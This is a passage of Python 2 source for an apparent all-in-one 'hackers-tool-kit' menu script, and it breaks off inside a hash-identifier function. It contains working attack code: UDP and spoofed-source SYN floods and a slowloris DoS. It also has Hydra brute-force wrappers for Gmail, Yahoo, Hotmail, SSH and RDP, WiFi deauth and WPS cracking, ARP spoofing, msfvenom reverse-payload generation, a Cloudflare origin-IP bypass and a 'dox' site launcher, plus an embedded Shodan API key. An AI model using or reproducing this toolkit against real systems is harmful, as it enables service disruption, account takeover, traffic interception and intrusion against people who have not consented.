'''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def 